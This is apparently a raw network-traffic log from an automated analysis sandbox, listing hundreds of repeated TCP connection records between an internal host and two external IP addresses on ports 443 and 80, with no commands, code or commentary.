Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
